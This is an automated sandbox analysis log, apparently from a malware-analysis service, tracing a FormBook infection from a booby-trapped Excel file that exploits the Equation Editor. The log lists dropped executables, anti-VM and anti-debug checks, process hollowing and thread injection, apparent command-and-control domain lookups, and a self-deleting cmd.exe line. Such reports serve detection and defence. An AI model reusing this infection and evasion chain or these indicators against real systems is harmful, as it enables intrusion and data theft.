        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$New order.xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63E0.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@11/16@2/2
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004021AA CoCreateInstance,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
        Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: .VBPud<_
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: vbc.exe, 00000004.00000002.996335800.0000000000789000.00000004.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000005.00000000.977201481.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000005.00000002.985046531.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000006.00000000.980432583.000000000132E000.00000002.00000001.01000000.00000005.sdmp, svchost.exe, 00000008.00000002.1171414662.000000000023C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171982272.0000000000D2F000.00000004.10000000.00040000.00000000.sdmp, fdvucso.exe.4.dr, nsbF6CE.tmp.4.dr
        Source: Binary string: wntdll.pdb source: fdvucso.exe, fdvucso.exe, 00000006.00000003.984908261.0000000000430000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1036425899.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1035304413.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000003.986623998.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1171527322.0000000000690000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1034856361.0000000000380000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171735626.0000000000810000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1036048676.0000000000500000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: svchost.pdb source: fdvucso.exe, 00000006.00000002.1035230712.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1034825185.0000000000030000.00000040.10000000.00040000.00000000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01322445 push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00417811 push cs; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041E9F4 push ds; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00416495 push edx; retf
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041D4B5 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041D56C push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041D502 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0041D50B push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_01322445 push ecx; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006ADFA1 push ecx; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00116495 push edx; retf
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011D4B5 push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011D502 push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011D50B push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011D56C push eax; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00117811 push cs; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011E9F4 push ds; ret
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0011DCB9 push edi; ret
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\fdvucso.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival

        barindex
        Drops PE files to the user root directory
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01321890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000109904 second address: 000000000010990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000000109B7E second address: 0000000000109B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1544Thread sleep time: -420000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00409AB0 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess information queried: ProcessInformation
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end node
        Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end node
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeAPI call chain: ExitProcess graph end node
        Source: explorer.exe, 00000007.00000000.1006642893.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
        Source: explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
        Source: vbc.exe, 00000004.00000002.996387571.0000000000914000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000lo
        Source: explorer.exe, 00000007.00000000.1048517448.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
        Source: explorer.exe, 00000007.00000000.1021582479.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000007.00000000.1006642893.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
        Source: explorer.exe, 00000007.00000000.1021428867.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
        Source: explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01321D2C _memset,IsDebuggerPresent,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01321D17 GetProcessHeap,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00409AB0 rdtsc
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: Debug
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036605E6 mov edx, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_00A526F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_006B26F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess queried: DebugPort
        Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0040ACF0 LdrLoadDll,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_0132439B SetUnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_013243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_0132439B SetUnhandledExceptionFilter,
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 6_2_013243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeDomain query: www.insurancecentral.info
        Source: C:\Windows\explorer.exeDomain query: www.xinli-ac.com
        Sample uses process hollowing technique
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection unmapped: C:\Windows\SysWOW64\svchost.exe base address: B20000
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeMemory written: C:\Users\user\AppData\Local\Temp\fdvucso.exe base: 400000 value starts with: 4D5A
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeThread APC queued: target process: C:\Windows\explorer.exe
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeThread register set: target process: 1860
        Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1860
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeProcess created: C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
        Source: explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.990258090.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1016566477.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000007.00000000.1002436760.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.990258090.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1016566477.0000000000830000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager<
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01323283 cpuid
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\fdvucso.exeCode function: 5_2_01323EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Scripting        		Path Interception1
        Access Token Manipulation        		1
        Deobfuscate/Decode Files or Information        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium33
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
        System Shutdown/Reboot
        Default Accounts11
        Native API        		Boot or Logon Initialization Scripts612
        Process Injection        		1
        Scripting        		LSASS Memory2
        File and Directory Discovery        		Remote Desktop Protocol1
        Credential API Hooking        		Exfiltration Over Bluetooth1
